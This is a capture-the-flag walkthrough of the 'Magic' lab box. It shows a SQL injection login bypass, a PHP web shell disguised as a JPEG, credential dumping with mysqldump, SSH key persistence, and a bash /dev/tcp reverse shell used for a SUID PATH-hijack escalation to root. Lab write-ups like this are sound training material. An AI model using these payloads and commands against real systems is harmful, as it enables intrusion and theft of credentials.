Magic HTB

IP

10.10.10.185

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.185 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//'

Ports open

22,80

Let's run a more in-depth scan (default scripts and version detection) of the open ports

sudo nmap -sCV -p22,80 -oA tcp_ports 10.10.10.185

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

What we can see:

  • SSH is open (OpenSSH 7.6p1)

  • an Apache 2.4.29 web server on port 80

  • the host is Ubuntu (both the SSH and Apache banners carry the Ubuntu package suffix)

Let's check out the web server.

It looks like:

  • we have the ability to log in, but cannot create an account

  • there is an image-upload feature (it sits behind the login)

  • the gallery serves GIFs and JPEGs

Given the name of the box, Magic, this could be a reference to magic bytes (file signatures): can we upload a PHP reverse shell and bypass the upload restrictions by giving it the signature of an image? Maybe.

For good measure, let's run feroxbuster against the site while we look at the login page.

feroxbuster

feroxbuster -u http://10.10.10.185 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http.txt

results

301      GET        9l       28w      313c http://10.10.10.185/images => http://10.10.10.185/images/
200      GET        2l      119w    12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200      GET        2l       87w     2439c http://10.10.10.185/assets/js/breakpoints.min.js
200      GET      118l      277w     4221c http://10.10.10.185/login.php
200      GET      151l      677w    68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200      GET      835l     1757w    16922c http://10.10.10.185/assets/css/main.css
200      GET       88l      506w    34251c http://10.10.10.185/images/fulls/2.jpg
200      GET      209l      457w    32922c http://10.10.10.185/images/fulls/1.jpg
200      GET        2l     1276w    88145c http://10.10.10.185/assets/js/jquery.min.js
301      GET        9l       28w      313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200      GET    23059l   117663w  9521972c http://10.10.10.185/images/uploads/7.jpg
200      GET       60l      207w     4051c http://10.10.10.185/
301      GET        9l       28w      317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301      GET        9l       28w      316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301      GET        9l       28w      321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
301      GET        9l       28w      324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301      GET        9l       28w      327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301      GET        9l       28w      313c http://10.10.10.185/images => http://10.10.10.185/images/
200      GET      587l     1232w    12433c http://10.10.10.185/assets/js/util.js
200      GET       16l       41w      280c http://10.10.10.185/assets/css/noscript.css
200      GET      390l      896w     8862c http://10.10.10.185/assets/js/main.js
200      GET        2l       87w     2439c http://10.10.10.185/assets/js/breakpoints.min.js
200      GET        2l       51w     1851c http://10.10.10.185/assets/js/browser.min.js
200      GET        2l      119w    12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200      GET      118l      277w     4221c http://10.10.10.185/login.php
200      GET       60l      207w     4053c http://10.10.10.185/index.php
200      GET      209l      457w    32922c http://10.10.10.185/images/fulls/1.jpg
200      GET       88l      506w    34251c http://10.10.10.185/images/fulls/2.jpg
200      GET      835l     1757w    16922c http://10.10.10.185/assets/css/main.css
200      GET      151l      677w    68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200      GET      192l     1093w    88071c http://10.10.10.185/images/fulls/5.jpeg
200      GET      255l     1421w   121103c http://10.10.10.185/images/uploads/magic-wand.jpg
200      GET      296l     2079w   173684c http://10.10.10.185/images/uploads/magic-1424x900.jpg
200      GET        2l     1276w    88145c http://10.10.10.185/assets/js/jquery.min.js
301      GET        9l       28w      321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
200      GET      490l     2867w   223637c http://10.10.10.185/images/uploads/logo.png
301      GET        9l       28w      313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200      GET       27l       59w      782c http://10.10.10.185/assets/js/upload.js
200      GET      108l      217w     2136c http://10.10.10.185/assets/css/upload.css
200      GET     3315l     6597w   390337c http://10.10.10.185/images/fulls/6.jpg
200      GET     1118l     7764w   656671c http://10.10.10.185/images/uploads/trx.jpg
200      GET     6721l    34616w  2627822c http://10.10.10.185/images/fulls/3.jpg
302      GET        0l        0w        0c http://10.10.10.185/logout.php => index.php
200      GET     8189l    47626w  2547702c http://10.10.10.185/images/uploads/giphy.gif
200      GET    23059l   117663w  9521972c http://10.10.10.185/images/uploads/7.jpg
200      GET       60l      207w     4052c http://10.10.10.185/
302      GET       84l      177w     2957c http://10.10.10.185/upload.php => login.php
301      GET        9l       28w      316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301      GET        9l       28w      317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301      GET        9l       28w      324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301      GET        9l       28w      327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301      GET        9l       28w      318c http://10.10.10.185/assets/sass => http://10.10.10.185/assets/sass/
301      GET        9l       28w      323c http://10.10.10.185/assets/sass/libs => http://10.10.10.185/assets/sass/libs/

/login.php

we can see the following

Let's catch the request with Burp and see if we can bypass authentication.

  • the username field is vulnerable to SQL injection, which lets us bypass authentication

Sending the username ' or 1=1 -- - (with any password), the request looks like this:

The back-end query would then look something like:

SELECT * FROM users WHERE username = '' or 1=1 -- -' AND password = 'admin';

  • the condition 1=1 always evaluates to true, so the WHERE clause no longer depends on a valid username, and -- - starts an SQL comment, so everything after it (the password check) is ignored. MySQL only treats -- as a comment when it is followed by whitespace, which is why the payload ends in a space and a trailing dash rather than a bare --.
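As an added example (my code, not the box's login.php), the bypass above replayed against an in-memory SQLite table. SQLite stands in for the MySQL `Magic` database; the table and column names are taken from the mysqldump output further down, the password value is a placeholder, and the function names are my own. The string-built query shows exactly what the injected username does to the statement, and the parameterized version shows why the same input is harmless there:

```python
import sqlite3

# Constructed stand-in for the MySQL `Magic` database (table/columns as in the
# mysqldump later in the writeup; the password value is a placeholder).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    conn.execute("INSERT INTO login VALUES (1, 'admin', 'placeholder-password')")
    conn.commit()
    return conn

def build_query(username: str, password: str) -> str:
    """The string-concatenated statement a vulnerable login.php would build."""
    return (
        "SELECT username FROM login WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Runs the concatenated query; returns the matched username or None."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None

def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Same lookup with bound parameters: the quote in the payload is data, not SQL."""
    row = conn.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The username sent in the Burp request; the trailing "-" keeps the space after
# "--" so MySQL (and SQLite) treat the rest of the line as a comment.
PAYLOAD = "' or 1=1 -- -"

if __name__ == "__main__":
    conn = make_db()
    print(build_query(PAYLOAD, "whatever"))
    print("vulnerable    :", login_vulnerable(conn, PAYLOAD, "whatever"))     # admin
    print("parameterized :", login_parameterized(conn, PAYLOAD, "whatever"))  # None
```

Everything after `-- ` is dropped by the parser, so the statement that actually runs is `SELECT username FROM login WHERE username = '' or 1=1`, which matches the first row (admin) regardless of the password. With bound parameters the whole payload is compared as a literal username and nothing matches.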

/upload.php

We are brought to /upload.php, where we have the ability to upload an image to the server.

Let's consider a few things:

  • PHP runs on the server (login.php, upload.php), so we want to run a PHP reverse shell (pentestmonkey's)

  • the name of the box being Magic is a good indication that we will have to add an image's magic bytes to the file so the server thinks we are sending a JPEG (this could also be done in Burp)

  1. Let's set up our payload and shell

  • we will use pentestmonkey's reverse shell

cp /usr/share/webshells/php/php-reverse-shell.php ./

Let's change the callback IP and port inside the file ($ip and $port), then set up our listener:

rlwrap -cAr nc -lvnp 9001
  2. We need to edit the file's leading bytes: with a hex editor such as hexedit we insert the four bytes of a JPEG signature at the very start of the file, in front of the <?php tag (insert them rather than typing over the existing bytes, since the first bytes of this file are the opening tag itself)

here is a list of 'file magic numbers'

https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

From this list we can see the JPEG magic bytes in hex are FF D8 FF E0 (the JFIF variant; every JPEG starts with FF D8 FF)

Now we need to put those four bytes at the front of the PHP reverse shell:

hexeditor php-reverse-shell.php

Now we can edit the magic bytes.

Our file is ready to be uploaded (well, almost).

  3. While uploading our file, let's catch the request with Burp

Notice we renamed the file with a .jpeg extension (php-reverse-shell.php.jpeg); this should breeze past the extension check.

  4. Now we just need to trigger our reverse shell by requesting it in the URL bar

http://10.10.10.185/images/uploads/php-reverse-shell.php.jpeg
  • hmmm, that did not go to plan

  • we bypassed the filters, but nothing connected back: the PHP file is being served as if it were an image and we get no functionality. One likely cause: pentestmonkey's shell starts with <?php, so if the hex editor overwrote the first four bytes instead of inserting them, the opening tag is gone and the server has no PHP to execute. (simple-backdoor.php, used next, starts with an HTML comment, so overwriting its first four bytes is harmless.)

Let's try a simple PHP command web shell instead.

Same process as before:

  1. copy it into our working directory

cp /usr/share/webshells/php/simple-backdoor.php ./
  2. add the JPEG magic bytes with hexeditor and rename the file cmd.php.jpeg

  3. upload it and catch the request with Burp

  4. head over to

http://10.10.10.185/images/uploads/cmd.php.jpeg

We can see the following:

Let's see if we can run system commands:

http://10.10.10.185/images/uploads/cmd.php.jpeg?cmd=whoami
  • we can send commands to the target server

Awesome, from here we can establish a reverse shell.

Now let's establish a connection back to our listener with a bash reverse shell, URL-encoded and passed as the cmd parameter in the URL bar.

We now have a shell on the system.

Looking in /var/www/Magic we find db.php5; when we cat it out we can see possible credentials:

theseus: iamkingtheseus

If we look in the /home directory we find the user theseus.

Let's see if we can access that account:

# we need a pty first
python3 -c "import pty;pty.spawn('/bin/bash')"
su theseus
  • no luck, the password is rejected

Since we found credentials to a database, it is good practice to check which ports are listening internally:

netstat -ano

(ss -tlnp shows the same thing along with the owning process, where permitted.)

We can see port 3306 (MySQL) and port 631 (most likely IPP, the Internet Printing Protocol).

Let's see if we can connect to the MySQL database:

mysql
  • unfortunately the mysql client is not installed on the machine

Let's see if we can find anything else related to MySQL:

locate mysql
  • among the output we do find something interesting:

/usr/bin/mysql_config_editor
/usr/bin/mysql_embedded
/usr/bin/mysql_install_db
/usr/bin/mysql_plugin
/usr/bin/mysql_secure_installation
/usr/bin/mysql_ssl_rsa_setup
/usr/bin/mysql_tzinfo_to_sql
/usr/bin/mysql_upgrade
/usr/bin/mysqladmin
/usr/bin/mysqlanalyze
/usr/bin/mysqlbinlog
/usr/bin/mysqlcheck
/usr/bin/mysqld_multi
/usr/bin/mysqld_safe
/usr/bin/mysqldump
/usr/bin/mysqldumpslow
/usr/bin/mysqlimport
/usr/bin/mysqloptimize
/usr/bin/mysqlpump
/usr/bin/mysqlrepair
/usr/bin/mysqlreport
/usr/bin/mysqlshow
/usr/bin/mysqlslap
  • Looks like we have found some MySQL tools we can use, most notably /usr/bin/mysqldump

Let's see if we can dump the database with the credentials from db.php5 (enter iamkingtheseus at the password prompt):

mysqldump -u theseus -p --all-databases

results

-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: 
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-01-09  1:36:15
  • Looks like we may have found some valid credentials

admin: Th3s3usW4sK1ng

Since there is no admin user on the box, it is a safe bet that this password is reused for theseus:

su theseus
  • which works

Let's check for sudo privileges:

sudo -l
  • theseus cannot run sudo on the machine

Let's get some persistence on the machine via SSH.

  1. Generate an SSH key pair (on the local machine):

ssh-keygen -f id-rsa
  2. Create the .ssh directory and an authorized_keys file on the target, and copy our public key into it:

mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCSlmBUVzNP7JWZkjJvtj5UFJOPCXXW7aW8BUfouwewcOl1TTzzd75qOMDIxOO/ndUjIm0rSn2Wc6nBsdBU5wT5ImNyoPPzlrwdGMKuhZDylufYLh+Q37dSma6IbWDV2U6NXQ3lNc0L2qLsxAfeZuhdlMaAWn/2NfReJS2re2axTwfNA9w0TECEZ7lIQtcxNjEKqMWwiE7QIu3EmbXd6b9jXQ9XjnGp7JheYXuzjWUyQXxAj61wK6LqBBpAYdIUcxKkMAVNEouzBoU7ZuvcuLlcGe+niVl7qoGyShEXsrKunlJcju2yigGqEEfCjvLjaKP8Q+EeGYMkjgjiJsn7m1fkHkQ4XAlhJp35fNtvqjaL6VIWME29OL0v2N1n1ZzMkzmMwVRX4GYW7hz+d/R8/rvnPyL/1Te8j9Xqs5NcLo9JHqXJPiv5uclKNA0h8HTVSO/er5dayO9CgEqRi6OiNalxo1oTycFOe5A4sYDKW9jJVsa1GjgT983Z3iOcVixTX7c=" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
  3. Now give our private key the appropriate permissions and see if we can log in via SSH:

chmod 600 id-rsa
ssh -i id-rsa theseus@10.10.10.185

We now have access via SSH.

When searching for SUID binaries we can see something interesting:

find / -type f -perm -4000 2>/dev/null

We find an odd program:

/bin/sysinfo

Checking its permissions shows that it is SUID root and executable by members of the users group.

Since theseus is part of the users group, we can execute it.

Running the command:

/bin/sysinfo

It just outputs a bunch of system information.

That is odd for a SUID binary, so let's run the tool under ltrace, which prints the library calls the binary makes:

ltrace /bin/sysinfo

Looking through the output we can see something interesting: the binary calls popen() to run fdisk.

popen() hands its command string to /bin/sh -c, and because the binary names fdisk without a full path, the shell resolves it through whatever PATH the caller supplies. That leaves this SUID binary vulnerable to PATH hijacking.

Let's test this theory.

  1. Create a reverse shell in the /dev/shm directory and save it in an executable file named fdisk:

cd /dev/shm
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.22/9001 0>&1' > fdisk
chmod +x fdisk
  2. Start a listener and execute the file directly to confirm it connects back to us:

# local machine
rlwrap -cAr nc -lvnp 9001
# target machine
./fdisk
  • we get a successful connection back from the target

  3. Now prepend /dev/shm to our PATH:

export PATH="/dev/shm:$PATH"
  4. Now when we run sysinfo it should execute our fdisk instead of the real one, and we should gain a reverse shell as root:

sysinfo
  5. Looking back at our listener, we should be root; confirm with id.
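As an added example (my code, not the sysinfo binary or the writeup's commands), the same hijack reproduced in a throwaway directory that stands in for /dev/shm, alongside the two fixes a SUID binary should have used: calling the tool by absolute path, or resetting PATH before spawning a shell. The planted fdisk here only prints a marker rather than opening a reverse shell, the search path constant is my assumption of a sane default, and the function names are mine:

```python
import os
import stat
import subprocess
import tempfile

# Constructed stand-in for the planted /dev/shm/fdisk: it announces itself
# instead of calling back to a listener.
FAKE_FDISK = "#!/bin/sh\necho HIJACKED\n"

# Assumed sane search path a hardened binary would force (not from the box).
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

def plant_fake_fdisk(directory: str) -> str:
    """echo '...' > fdisk; chmod +x fdisk, done from Python."""
    path = os.path.join(directory, "fdisk")
    with open(path, "w") as f:
        f.write(FAKE_FDISK)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path

def popen_like(command: str, path_env: str) -> str:
    """popen(3) runs its string via /bin/sh -c, and sh resolves bare command
    names through PATH.  Only PATH is passed in the environment so the result
    depends on nothing else."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True,
                          env={"PATH": path_env}, timeout=30)
    return proc.stdout.strip()

def hijacked(command: str, path_env: str) -> bool:
    """True when our planted script, not the real fdisk, answered the call."""
    return popen_like(command, path_env) == "HIJACKED"

def demo() -> dict:
    with tempfile.TemporaryDirectory() as shm:   # stands in for /dev/shm
        plant_fake_fdisk(shm)
        attacker_path = shm + ":" + SAFE_PATH    # export PATH="/dev/shm:$PATH"
        return {
            # what sysinfo does: bare name, caller-controlled PATH
            "bare_name_attacker_path": hijacked("fdisk -l", attacker_path),
            # fix 1: absolute path, PATH no longer consulted for the command
            "absolute_path_attacker_path": hijacked("/sbin/fdisk -l", attacker_path),
            # fix 2: bare name but PATH reset to a trusted value first
            "bare_name_reset_path": hijacked("fdisk -l", SAFE_PATH),
        }

if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:30s} hijacked={result}")
```

Only the first case succeeds; the real /sbin/fdisk may print an error about permissions or be missing on the machine running this, but either way it never prints our marker. The deeper fix for a SUID program is not to reach for popen() or system() at all, since every environment variable the caller controls, PATH included, is inherited by the /bin/sh they spawn.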
